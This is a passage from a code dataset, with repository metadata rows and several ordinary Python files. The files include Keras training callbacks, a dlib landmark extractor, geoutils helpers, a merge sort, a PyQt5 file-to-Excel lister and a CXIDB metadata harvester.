| 37.513812
| 80
| 0.546318
| 13,142
| 0.967747
| 0
| 0
| 12,915
| 0.951031
| 0
| 0
| 4,838
| 0.356259
|
b0e21640f79315d5678d2b1eb1562ded16d33050
| 1,935
|
py
|
Python
|
policy/openbot/callbacks.py
|
januxnet/OpenBot
|
04768161a552281e1e14acde98589a64628b86c7
|
[
"MIT"
] | 1,971
|
2020-08-24T22:24:24.000Z
|
2021-07-24T18:43:39.000Z
|
policy/openbot/callbacks.py
|
FlorentGuinier/OpenBot
|
087b1c89fd61ee5e644a0b042c9e5f25540caeae
|
[
"MIT"
] | 145
|
2020-08-26T23:00:28.000Z
|
2021-07-26T22:00:06.000Z
|
policy/openbot/callbacks.py
|
FlorentGuinier/OpenBot
|
087b1c89fd61ee5e644a0b042c9e5f25540caeae
|
[
"MIT"
] | 342
|
2020-08-26T10:39:43.000Z
|
2021-07-26T12:12:10.000Z
|
# Created by Matthias Mueller - Intel Intelligent Systems Lab - 2020
import os
import tensorflow as tf
def checkpoint_cb(checkpoint_path, steps_per_epoch=-1, num_epochs=10):
# Create a callback that saves the model's weights every epochs
checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=os.path.join(checkpoint_path, "cp-{epoch:04d}.ckpt"),
monitor="val_loss",
verbose=0,
save_best_only=False,
save_weights_only=False,
mode="auto",
save_freq="epoch" if steps_per_epoch < 0 else int(num_epochs * steps_per_epoch),
)
return checkpoint_callback
def tensorboard_cb(log_path):
tensorboard_callback = tf.keras.callbacks.TensorBoard(
log_dir=log_path,
histogram_freq=0,
write_graph=True,
write_images=True,
update_freq="epoch",
profile_batch=2,
embeddings_freq=0,
embeddings_metadata=None,
)
return tensorboard_callback
def logger_cb(log_path, append=False):
logger_callback = tf.keras.callbacks.CSVLogger(
os.path.join(log_path, "log.csv"), append=append
)
return logger_callback
def early_stopping_cb():
early_stopping_callback = tf.keras.callbacks.EarlyStopping(
monitor="val_loss",
min_delta=0,
patience=20,
verbose=0,
mode="auto",
baseline=None,
restore_best_weights=False,
)
return early_stopping_callback
def reduce_lr_cb():
reduce_lr_callback = tf.keras.callbacks.ReduceLROnPlateau(
monitor="val_loss", factor=0.3, patience=2, min_lr=0.0001
)
return reduce_lr_callback
def lr_schedule_cb():
return tf.keras.callbacks.LearningRateScheduler(scheduler)
# This function defines a custom learning schedule.
def scheduler(epoch):
if epoch < 10:
return 0.0002
elif epoch < 20:
return 0.0001
else:
return 0.00005
| 26.148649
| 88
| 0.67907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 268
| 0.138501
|
b0e2cf5bd2ba70f93247b07879264830fda0661a
| 856
|
py
|
Python
|
generate_landmarks.py
|
PandaWhoCodes/chutya_rating
|
88f73e37c517c1d68ebf518b40cf93667f39991b
|
[
"MIT"
] | null | null | null |
generate_landmarks.py
|
PandaWhoCodes/chutya_rating
|
88f73e37c517c1d68ebf518b40cf93667f39991b
|
[
"MIT"
] | null | null | null |
generate_landmarks.py
|
PandaWhoCodes/chutya_rating
|
88f73e37c517c1d68ebf518b40cf93667f39991b
|
[
"MIT"
] | null | null | null |
import sys
import os
import dlib
import glob
from skimage import io
predictor_path = "data/shape_predictor_68_face_landmarks.dat"
faces_folder_path = "data/pics"
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(predictor_path)
def sortKeyFunc(s):
return int(os.path.basename(s)[:-4])
my_glob = glob.glob(os.path.join(faces_folder_path, "*.jpg"))
my_glob.sort(key=sortKeyFunc)
print(my_glob)
for f in my_glob:
print("Processing file: {}".format(f))
img = io.imread(f)
dets = detector(img, 1)
for k, d in enumerate(dets):
shape = predictor(img, d)
file_write = ""
for i in range(0, 68):
file_write += str(shape.part(i).x) + ", " + str(shape.part(i).y) + ", "
with open("data/landmarks.txt", "a") as f:
f.write(file_write)
f.write("\n")
| 25.939394
| 83
| 0.647196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.140187
|
b0e46a90af345235275bf125d7191b762e1c076e
| 6,530
|
py
|
Python
|
geoutils/misc.py
|
erikmannerfelt/GeoUtils
|
96a044f7cca73f936e5b245a5e99e0d2102d279f
|
[
"BSD-3-Clause"
] | 23
|
2020-11-11T11:00:45.000Z
|
2022-03-28T07:06:56.000Z
|
geoutils/misc.py
|
erikmannerfelt/GeoUtils
|
96a044f7cca73f936e5b245a5e99e0d2102d279f
|
[
"BSD-3-Clause"
] | 223
|
2020-11-11T14:34:51.000Z
|
2022-03-31T14:14:58.000Z
|
geoutils/misc.py
|
erikmannerfelt/GeoUtils
|
96a044f7cca73f936e5b245a5e99e0d2102d279f
|
[
"BSD-3-Clause"
] | 14
|
2021-02-19T09:57:46.000Z
|
2022-03-21T09:49:12.000Z
|
"""Miscellaneous functions, mainly for testing."""
from __future__ import annotations
import functools
import warnings
import numpy as np
import rasterio as rio
import geoutils
from geoutils._typing import ArrayLike
from geoutils.georaster import Raster, RasterType
def array_equal(
array1: RasterType | ArrayLike,
array2: RasterType | ArrayLike,
equal_nan: bool = True,
tolerance: float = 0.0,
) -> bool:
"""
Check if two arrays or Rasters are equal.
This function mirrors (and partly uses) 'np.array_equal' with these exceptions:
1. Different dtypes are okay as long as they are equal (e.g. '1 == 1.0' is True)
2. Rasters are directly comparable.
3. masked_array masks are respected.
4. A tolerance argument is added.
5. The function works with numpy<=1.18.
:param array1: The first array-like object to compare.
:param array2: The second array-like object to compare.
:param equal_nan: Whether to compare NaNs as equal ('NaN == NaN' is True)
:param tolerance: The maximum allowed summed difference between the arrays.
Examples:
Any object that can be parsed as an array can be compared.
>>> arr1 = [1, 2, 3]
>>> arr2 = np.array([1., 2., 3.])
>>> array_equal(arr1, arr2)
True
Nans are equal by default, but can be disabled with 'equal_nan=False'
>>> arr3 = np.array([1., 2., np.nan])
>>> array_equal(arr1, arr3)
False
>>> array_equal(arr3, arr3.copy())
True
>>> array_equal(arr3, arr3, equal_nan=False)
False
The equality tolerance can be set with the 'tolerance' argument (defaults to 0).
>>> arr4 = np.array([1., 2., 3.1])
>>> array_equal(arr1, arr4)
False
>>> array_equal(arr1, arr4, tolerance=0.2)
True
Masks in masked_arrays are respected.
>>> arr5 = np.ma.masked_array(arr1, [False, False, True])
>>> array_equal(arr1, arr5)
False
>>> array_equal(arr3, arr5)
True
>>> array_equal(arr3, arr5, equal_nan=False)
False
"""
arrays: list[np.ndarray] = []
strings_compared = False # Flag to handle string arrays instead of numeric
# Convert both inputs to numpy ndarrays
for arr in array1, array2:
if any(s in np.dtype(type(np.asanyarray(arr)[0])).name for s in ("<U", "str")):
strings_compared = True
if isinstance(arr, Raster): # If a Raster subclass, take its data. I don't know why mypy complains here!
arr = arr.data # type: ignore
if isinstance(arr, np.ma.masked_array): # If a masked_array, replace the masked values with nans
if "float" not in np.dtype(arr.dtype).name:
arr = arr.astype(float)
arrays.append(arr.filled(np.nan)) # type: ignore
else:
arrays.append(np.asarray(arr))
if np.shape(arrays[0]) != np.shape(arrays[1]):
return False
if strings_compared: # If they are strings, the tolerance/nan handling is irrelevant.
return bool(np.array_equal(arrays[0], arrays[1]))
diff = np.diff(arrays, axis=0)
if "float" in np.dtype(diff.dtype).name and np.any(~np.isfinite(diff)):
# Check that the nan-mask is equal. If it's not, or nans are not allowed at all, return False
if not equal_nan or not np.array_equal(np.isfinite(arrays[0]), np.isfinite(arrays[1])):
return False
return bool(np.nansum(np.abs(diff)) <= tolerance)
def deprecate(removal_version: str | None = None, details: str | None = None): # type: ignore
"""
Trigger a DeprecationWarning for the decorated function.
:param func: The function to be deprecated.
:param removal_version: Optional. The version at which this will be removed.
If this version is reached, a ValueError is raised.
:param details: Optional. A description for why the function was deprecated.
:triggers DeprecationWarning: For any call to the function.
:raises ValueError: If 'removal_version' was given and the current version is equal or higher.
:returns: The decorator to decorate the function.
"""
def deprecator_func(func): # type: ignore
@functools.wraps(func)
def new_func(*args, **kwargs): # type: ignore
# True if it should warn, False if it should raise an error
should_warn = removal_version is None or removal_version > geoutils.version.version
# Add text depending on the given arguments and 'should_warn'.
text = (
f"Call to deprecated function '{func.__name__}'."
if should_warn
else f"Deprecated function '{func.__name__}' was removed in {removal_version}."
)
# Add the details explanation if it was given, and make sure the sentence is ended.
if details is not None:
details_frm = details.strip()
if details_frm[0].islower():
details_frm = details_frm[0].upper() + details_frm[1:]
text += " " + details_frm
if not any(text.endswith(c) for c in ".!?"):
text += "."
if should_warn and removal_version is not None:
text += f" This functionality will be removed in version {removal_version}."
elif not should_warn:
text += f" Current version: {geoutils.version.version}."
if should_warn:
warnings.warn(text, category=DeprecationWarning, stacklevel=2)
else:
raise ValueError(text)
return func(*args, **kwargs)
return new_func
return deprecator_func
def resampling_method_from_str(method_str: str) -> rio.warp.Resampling:
"""Get a rasterio resampling method from a string representation, e.g. "cubic_spline"."""
# Try to match the string version of the resampling method with a rio Resampling enum name
for method in rio.warp.Resampling:
if str(method).replace("Resampling.", "") == method_str:
resampling_method = method
break
# If no match was found, raise an error.
else:
raise ValueError(
f"'{method_str}' is not a valid rasterio.warp.Resampling method. "
f"Valid methods: {[str(method).replace('Resampling.', '') for method in rio.warp.Resampling]}"
)
return resampling_method
| 38.187135
| 113
| 0.622971
| 0
| 0
| 0
| 0
| 1,453
| 0.222511
| 0
| 0
| 3,665
| 0.561256
|
b0e7cd1cacbdf9713f6574f513c54cc6fc8be57b
| 1,860
|
py
|
Python
|
sorting/merge_sort.py
|
matuzalemmuller/algoritmos
|
138e7c9747879a58fab48908541c175b8653da5c
|
[
"MIT"
] | null | null | null |
sorting/merge_sort.py
|
matuzalemmuller/algoritmos
|
138e7c9747879a58fab48908541c175b8653da5c
|
[
"MIT"
] | null | null | null |
sorting/merge_sort.py
|
matuzalemmuller/algoritmos
|
138e7c9747879a58fab48908541c175b8653da5c
|
[
"MIT"
] | null | null | null |
# UFSC - Campus Trindade
# PPGEAS - Introducao a Algoritmos
# Matuzalem Muller dos Santos
# 2019/1
# Commented code is for calculating algorithm completixy and printing variables
from random import randint
import time
import sys
def merge_sort(array):
# n = 0
if len(array) > 1:
half = len(array) // 2
left_array = array[:half]
right_array = array[half:]
# n += merge_sort(left_array)
# n += merge_sort(right_array)
merge_sort(left_array)
merge_sort(right_array)
left_mark, right_mark, position = 0, 0, 0
while left_mark < len(left_array) and right_mark < len(right_array):
if left_array[left_mark] < right_array[right_mark]:
array[position] = left_array[left_mark]
left_mark += 1
else:
array[position] = right_array[right_mark]
right_mark += 1
position += 1
# n += 1
while left_mark < len(left_array):
array[position] = left_array[left_mark]
left_mark += 1
position += 1
# n += 1
while right_mark < len(right_array):
array[position] = right_array[right_mark]
right_mark += 1
position += 1
# n += 1
# return array, n
return array
if __name__ == '__main__':
array = []
random_number = 0
try:
number_of_elements = int(sys.argv[1])
except:
number_of_elements = 10
for i in range(0, number_of_elements):
random_number = randint(1, 9_999_999_999)
array.append(random_number)
# print(array)
start_time = time.time()
# array, n = merge_sort(array)
array = merge_sort(array)
running_time = time.time() - start_time
# print(array)
# print(n)
print(running_time)
| 26.956522
| 79
| 0.58172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 359
| 0.193011
|
b0e7ec352bf4d97e4861749ed21422b37bbf8b42
| 2,239
|
py
|
Python
|
binsync/data/struct.py
|
zachsez/binsync
|
39a53a84c640314adbf50e612177c4a56c43542c
|
[
"MIT"
] | 40
|
2021-05-09T03:24:46.000Z
|
2022-03-31T23:01:50.000Z
|
binsync/data/struct.py
|
zachsez/binsync
|
39a53a84c640314adbf50e612177c4a56c43542c
|
[
"MIT"
] | 53
|
2021-05-27T07:53:58.000Z
|
2022-03-27T21:35:26.000Z
|
binsync/data/struct.py
|
zachsez/binsync
|
39a53a84c640314adbf50e612177c4a56c43542c
|
[
"MIT"
] | 10
|
2021-05-13T22:09:38.000Z
|
2022-03-31T23:51:27.000Z
|
import toml
from typing import List, Dict
from .artifact import Artifact
class StructMember(Artifact):
"""
Describes a struct member that corresponds to a struct.
"""
__slots__ = (
"last_change",
"member_name",
"offset",
"type",
"size",
)
def __init__(self, member_name, offset, type_, size, last_change=None):
super(StructMember, self).__init__(last_change=last_change)
self.member_name: str = member_name
self.offset: int = offset
self.type: str = type_
self.size: int = size
@classmethod
def parse(cls, s):
sm = StructMember(None, None, None, None)
sm.__setstate__(toml.loads(s))
return sm
class Struct(Artifact):
"""
Describes a struct
"""
__slots__ = (
"last_change",
"name",
"size",
"struct_members",
)
def __init__(self, name: str, size: int, struct_members: List[StructMember], last_change=None):
super(Struct, self).__init__(last_change=last_change)
self.name = name
self.size = size
self.struct_members = struct_members
def __getstate__(self):
return {
"metadata": {
"name": self.name, "size": self.size, "last_change": self.last_change
},
"members": {"%x" % member.offset: member.__getstate__() for member in self.struct_members}
}
def __setstate__(self, state):
metadata = state["metadata"]
members = state["members"]
self.name = metadata["name"]
self.size = members["size"]
self.last_change = members.get("last_change", None)
self.struct_members = [
StructMember.parse(toml.dumps(member)) for _, member in members.items()
]
def add_struct_member(self, mname, moff, mtype, size):
self.struct_members.append(StructMember(mname, moff, mtype, size))
@classmethod
def parse(cls, s):
struct = Struct(None, None, None)
struct.__setstate__(s)
return struct
@classmethod
def load(cls, struct_toml):
s = Struct(None, None, None)
s.__setstate__(struct_toml)
return s
| 23.568421
| 102
| 0.590442
| 2,151
| 0.960697
| 0
| 0
| 406
| 0.181331
| 0
| 0
| 284
| 0.126842
|
b0e84025ba8edc34831e545492abd9cc1b7a33c6
| 9,070
|
py
|
Python
|
__init__.py
|
itsmepvr/list_images_to_excel
|
a4da3948a289c91cbcab90980364e989af7f1118
|
[
"MIT"
] | null | null | null |
__init__.py
|
itsmepvr/list_images_to_excel
|
a4da3948a289c91cbcab90980364e989af7f1118
|
[
"MIT"
] | null | null | null |
__init__.py
|
itsmepvr/list_images_to_excel
|
a4da3948a289c91cbcab90980364e989af7f1118
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Author: Venkata Ramana P
<github.com/itsmepvr>
List files to an excel sheet
"""
import os, glob
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QMessageBox
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from os.path import expanduser
import xlsxwriter
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(569, 304)
MainWindow.setStyleSheet("background-color:rgba(0,0,0,0.5); font-weight:bold;")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(10, 40, 391, 26))
self.lineEdit.setStyleSheet("background-color:rgb(255, 255, 255)")
self.lineEdit.setObjectName("lineEdit")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(410, 40, 151, 26))
self.pushButton.setStyleSheet("background-color:rgb(255, 255, 255)")
self.pushButton.setObjectName("pushButton")
self.pushButton.clicked.connect(self.chooseFilesDirectory)
self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_2.setGeometry(QtCore.QRect(10, 80, 391, 26))
self.lineEdit_2.setStyleSheet("background-color:rgb(255, 255, 255)")
self.lineEdit_2.setText("")
self.lineEdit_2.setObjectName("lineEdit_2")
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(410, 80, 151, 26))
self.pushButton_2.setStyleSheet("background-color:rgb(255, 255, 255)")
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_2.clicked.connect(self.chooseExcelDirectory)
self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_3.setGeometry(QtCore.QRect(10, 120, 391, 26))
self.lineEdit_3.setStyleSheet("background-color:rgb(255, 255, 255)")
self.lineEdit_3.setText("files_to_list")
self.lineEdit_3.setObjectName("lineEdit_3")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(410, 117, 141, 31))
self.label.setStyleSheet("color:rgb(255, 255, 255);\n"
"background-color:none;\n"
"font-weight:bold;")
self.label.setObjectName("label")
self.checkBox = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox.setEnabled(True)
self.checkBox.setGeometry(QtCore.QRect(170, 160, 121, 31))
self.checkBox.setTabletTracking(False)
self.checkBox.setAutoFillBackground(False)
self.checkBox.setStyleSheet("color:rgb(230, 75, 238);\n"
"background-color:none;\n"
"font-weight:bold;\n"
"font-size:25px;")
self.checkBox.setChecked(True)
self.checkBox.setObjectName("checkBox")
self.checkBox_2 = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox_2.setGeometry(QtCore.QRect(300, 160, 131, 31))
self.checkBox_2.setStyleSheet("color:rgb(230, 75, 238);\n"
"background-color:none;\n"
"font-weight:bold;\n"
"font-size:25px;")
self.checkBox_2.setObjectName("checkBox_2")
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(270, 210, 121, 31))
self.pushButton_3.setStyleSheet("background-color: rgb(138, 226, 52);\n"
"color:black;\n"
"font-weight:bold;")
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_3.clicked.connect(self.checkFields)
self.pushButton_4 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_4.setGeometry(QtCore.QRect(400, 210, 131, 31))
self.pushButton_4.setStyleSheet("background-color: rgb(239, 41, 41);\n"
"color:black;\n"
"font-weight:bold;")
self.pushButton_4.setObjectName("pushButton_4")
self.pushButton_4.clicked.connect(self.quit)
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(70, 260, 461, 20))
self.label_2.setStyleSheet("color:rgb(252, 175, 62);\n"
"font: italic 11pt \"DejaVu Serif\";\n"
"")
self.label_2.setObjectName("label_2")
self.progressBar = QtWidgets.QProgressBar(self.centralwidget)
self.progressBar.setGeometry(QtCore.QRect(40, 220, 201, 23))
self.progressBar.setStyleSheet("background-color:rgb(243, 243, 243)")
self.progressBar.setProperty("value", 24)
self.progressBar.setObjectName("progressBar")
self.progressBar.hide()
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.filePath = "/home/itsmepvr/.local/share/Anki2/3-4 Years Primary/collection.media"
self.excelPath = "/home/itsmepvr/Downloads"
self.excelName = "files_to_list"
self.ext = []
self.convert()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "List Files to Excel"))
self.pushButton.setText(_translate("MainWindow", "Select Files Path"))
self.pushButton_2.setText(_translate("MainWindow", "Select Excel Path"))
self.label.setText(_translate("MainWindow", "Excel File Name"))
self.checkBox.setText(_translate("MainWindow", "Images"))
self.checkBox_2.setText(_translate("MainWindow", "Audios"))
self.pushButton_3.setText(_translate("MainWindow", "Convert"))
self.pushButton_4.setText(_translate("MainWindow", "Cancel"))
self.label_2.setText(_translate("MainWindow", "Developed by: Venkata Ramana P <github.com/itsmepvr>"))
def quit(self):
self.close()
def chooseFilesDirectory(self):
self.progressBar.hide()
src_dir = QFileDialog.getExistingDirectory(None, 'Select a folder:', expanduser("~"))
self.lineEdit.setText(src_dir)
def chooseExcelDirectory(self):
self.progressBar.hide()
src_dir = QFileDialog.getExistingDirectory(None, 'Select a folder:', expanduser("~"))
self.lineEdit_2.setText(src_dir)
def checkFields(self):
self.filePath = self.lineEdit.text()
self.excelPath = self.lineEdit_2.text()
self.excelName = self.lineEdit_3.text()
if not os.path.isdir(self.filePath):
QMessageBox.warning(None, "Warning", "Files path does not exists", QtWidgets.QMessageBox.Ok)
return
if not os.path.isdir(self.excelPath):
QMessageBox.warning(None, "Warning", "Excel path does not exists", QtWidgets.QMessageBox.Ok)
return
if self.excelName == '':
QMessageBox.warning(None, "Warning", "Excel file name cannot be empty", QtWidgets.QMessageBox.Ok)
return
if not (self.checkBox.isChecked() or self.checkBox_2.isChecked()):
QMessageBox.warning(None, "Warning", "Select any images/audios", QtWidgets.QMessageBox.Ok)
return
self.ext = []
if self.checkBox.isChecked():
self.ext.append("images")
if self.checkBox_2.isChecked():
self.ext.append("audios")
self.convert()
def convert(self):
files = self.getImages(self.filePath)
excel = os.path.join(self.excelPath, self.excelName+'.xlsx')
workbook = xlsxwriter.Workbook(excel)
worksheet = workbook.add_worksheet()
row = 0
incValue = 100/len(files)
progressCount = 0
self.progressBar.setValue(0)
self.progressBar.show()
for fl in files:
worksheet.write(row, 0, fl)
row += 1
progressCount += incValue
self.progressBar.setValue(progressCount)
self.progressBar.setValue(100)
workbook.close()
def getImages(self, path):
img = []
files = []
ext = []
if "images" in self.ext:
ext = ext + ['png', 'jpg', 'gif']
if "audios" in self.ext:
ext = ext + ['mp3', 'wav']
ext = ['png', 'jpg', 'gif']
# [files.extend(glob.glob(path + '/*.' + e)) for e in ext]
# files.sort()
# dd = os.listdir(path)
# dd.sort()
for file in os.listdir(path):
if file.endswith(".png") or file.endswith(".jpg"):
files.append(file)
return files
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 43.190476
| 110
| 0.661632
| 8,444
| 0.930981
| 0
| 0
| 0
| 0
| 0
| 0
| 1,847
| 0.203638
|
b0e8a0baacae15b6d64e13be86210039b28af7e3
| 1,215
|
py
|
Python
|
exception.py
|
a2gs/pythonStudy
|
e790e223a05fd50a5bcaf1240ef24ff60f361cdd
|
[
"MIT"
] | null | null | null |
exception.py
|
a2gs/pythonStudy
|
e790e223a05fd50a5bcaf1240ef24ff60f361cdd
|
[
"MIT"
] | null | null | null |
exception.py
|
a2gs/pythonStudy
|
e790e223a05fd50a5bcaf1240ef24ff60f361cdd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class myBaseException(Exception):
def __init__(self, errNum, errMsg):
self.err = errNum
self.msg = errMsg
class myExcept_1(myBaseException):
def __init__(self):
super().__init__(13, "except 1")
class myExcept_2(myBaseException):
def __init__(self):
super().__init__(8, "except 2")
def func(b):
if(b == 1):
raise myExcept_1
elif(b == 2):
raise myExcept_2
elif(b == 3):
return
try:
func(1)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done1\n----------------------------------------')
try:
func(2)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done2\n----------------------------------------')
try:
func(3)
except myExcept_1 as e:
print(f'Erro number: {e.err} message: {e.msg}')
except myExcept_2 as e:
print(f'Erro number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
| 19.918033
| 56
| 0.626337
| 289
| 0.23786
| 0
| 0
| 0
| 0
| 0
| 0
| 472
| 0.388477
|
b0e8e97e17556ae476f654f72b30433601cb2273
| 564
|
py
|
Python
|
datachecker/processors/conditionals.py
|
jayclassless/datachecker
|
dd42b95f87eaaca428595fe5da639f9a710afba8
|
[
"MIT"
] | null | null | null |
datachecker/processors/conditionals.py
|
jayclassless/datachecker
|
dd42b95f87eaaca428595fe5da639f9a710afba8
|
[
"MIT"
] | null | null | null |
datachecker/processors/conditionals.py
|
jayclassless/datachecker
|
dd42b95f87eaaca428595fe5da639f9a710afba8
|
[
"MIT"
] | null | null | null |
from ..errors import DataRequiredError, ShortCircuitSignal
from ..util import processor
__all__ = (
'required',
'optional',
)
@processor
def required():
def required_processor(data):
if data is None:
raise DataRequiredError()
return data
return required_processor
@processor
def optional(default=None):
def optional_processor(data):
if data is None:
signal = ShortCircuitSignal()
signal.data = default
raise signal
return data
return optional_processor
| 18.8
| 58
| 0.64539
| 0
| 0
| 0
| 0
| 421
| 0.746454
| 0
| 0
| 20
| 0.035461
|
b0eca7b772b3e9b8c51b6d9de56d789e01ceaffc
| 226
|
py
|
Python
|
python/args/multiple.py
|
jdurbin/sandbox
|
ee982f7386ae02c5937dbaee867710b5cd2cc71b
|
[
"MIT"
] | null | null | null |
python/args/multiple.py
|
jdurbin/sandbox
|
ee982f7386ae02c5937dbaee867710b5cd2cc71b
|
[
"MIT"
] | null | null | null |
python/args/multiple.py
|
jdurbin/sandbox
|
ee982f7386ae02c5937dbaee867710b5cd2cc71b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys,argparse
parser = argparse.ArgumentParser()
parser.add_argument('-foo', nargs='+', help='foo values', required=False)
args = parser.parse_args()
for foo in args.foo:
print("Foo: ",foo)
| 20.545455
| 73
| 0.70354
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.221239
|
b0ed0165784914f7dc8282f6f368dd72c90b41f2
| 1,594
|
py
|
Python
|
src/parent_class/ParentPluralList.py
|
jameskabbes/parent_class
|
cecf938a2f9c66d8914967098b2064526bbec1c7
|
[
"MIT"
] | null | null | null |
src/parent_class/ParentPluralList.py
|
jameskabbes/parent_class
|
cecf938a2f9c66d8914967098b2064526bbec1c7
|
[
"MIT"
] | null | null | null |
src/parent_class/ParentPluralList.py
|
jameskabbes/parent_class
|
cecf938a2f9c66d8914967098b2064526bbec1c7
|
[
"MIT"
] | null | null | null |
from parent_class import ParentPlural
from typing import List
class ParentPluralList( ParentPlural ):
def __init__( self, att = 'list' ):
ParentPlural.__init__( self, att = att )
self.set_attr( self.att, [] )
def __len__( self ):
return len(self.get_list())
def __next__( self ):
self.i += 1
if self.i >= len(self):
raise StopIteration
else:
return self.get_list()[ self.i ]
def _add( self, value ):
list = self.get_list()
list.append( value )
self.set_list( list )
def _remove( self, Inst, all_occurences = False ) -> bool:
"""remove the Inst from the class List"""
removed = False
inds = []
Insts = list(self)
for i in range(len(self)):
if Insts[i] == Inst:
inds.append(i)
removed = True
if not all_occurences:
break
self._remove_inds( inds )
return removed
def _remove_inds( self, inds: List[int] ):
"""Given a list of indices, remove the Objects at those indicies from the class List"""
list = self.get_list()
inds.sort( reverse=True )
for ind in inds:
del list[ind]
self.set_list( list )
def set_list( self, list ):
self.set_attr( self.att, list )
def get_list( self ):
return self.get_attr( self.att )
if __name__ == '__main__':
a = ParentPluralList()
a.print_atts()
| 21.835616
| 95
| 0.527604
| 1,456
| 0.913425
| 0
| 0
| 0
| 0
| 0
| 0
| 144
| 0.090339
|
b0ed1693b1a77aee2f28b941c3d753890e7d9408
| 1,454
|
py
|
Python
|
prototypes/harvesters/cxidb_harvester.py
|
materials-data-facility/connect
|
9ec5b61750bf6fa579bf3ec122f31880d3c049b8
|
[
"Apache-2.0"
] | 1
|
2019-09-13T18:35:56.000Z
|
2019-09-13T18:35:56.000Z
|
prototypes/harvesters/cxidb_harvester.py
|
materials-data-facility/connect_server
|
9ec5b61750bf6fa579bf3ec122f31880d3c049b8
|
[
"Apache-2.0"
] | 15
|
2018-11-01T18:08:11.000Z
|
2021-12-06T17:55:03.000Z
|
prototypes/harvesters/cxidb_harvester.py
|
materials-data-facility/connect
|
9ec5b61750bf6fa579bf3ec122f31880d3c049b8
|
[
"Apache-2.0"
] | 1
|
2020-11-30T17:02:41.000Z
|
2020-11-30T17:02:41.000Z
|
import requests
from json import dump
import os
from shutil import rmtree
from tqdm import tqdm
#Collects available data from CXIDB and saves to the given directory
#out_dir: The path to the directory (which will be created) for the data files
#existing_dir:
# -1: Remove out_dir if it exists
# 0: Error if out_dir exists (Default)
# 1: Overwrite files in out_dir if there are path collisions
#verbose: Print status messages? Default False
def harvest(out_dir, existing_dir=0, verbose=False):
if os.path.exists(out_dir):
if existing_dir == 0:
exit("Directory '" + out_dir + "' exists")
elif not os.path.isdir(out_dir):
exit("Error: '" + out_dir + "' is not a directory")
elif existing_dir == -1:
rmtree(out_dir)
os.mkdir(out_dir)
else:
os.mkdir(out_dir)
#Fetch list of ids
id_res = requests.get("http://cxidb.org/index.json")
if id_res.status_code != 200:
exit("IDs GET failure: " + str(id_res.status_code) + " error")
id_list = id_res.json()
for id_entry in tqdm(id_list, desc="Fetching metadata", disable= not verbose):
id_data = requests.get("http://cxidb.org/" + id_entry)
if id_data.status_code != 200:
exit("ID fetch failure: " + str(id_data.status_code) + " error")
with open(os.path.join(out_dir, id_entry), 'w') as out_file:
dump(id_data.json(), out_file)
| 36.35
| 82
| 0.643741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 555
| 0.381706
|
b0ed5b6a6f6876d6d3b9b9b973debc09d4041302
| 136
|
py
|
Python
|
bot/permissions.py
|
Yakov-Varnaev/Epicker_bot
|
da077e0bcfbd41a2efaed74d71e7c4c818b842c0
|
[
"MIT"
] | null | null | null |
bot/permissions.py
|
Yakov-Varnaev/Epicker_bot
|
da077e0bcfbd41a2efaed74d71e7c4c818b842c0
|
[
"MIT"
] | null | null | null |
bot/permissions.py
|
Yakov-Varnaev/Epicker_bot
|
da077e0bcfbd41a2efaed74d71e7c4c818b842c0
|
[
"MIT"
] | null | null | null |
from aiogram import types
import config
async def is_admin(message: types.Message):
return message.from_user.id in config.ADMINS
| 17
| 48
| 0.786765
| 0
| 0
| 0
| 0
| 0
| 0
| 92
| 0.676471
| 0
| 0
|
b0f062298bedb55fde1aeecf88bc32677fffabc9
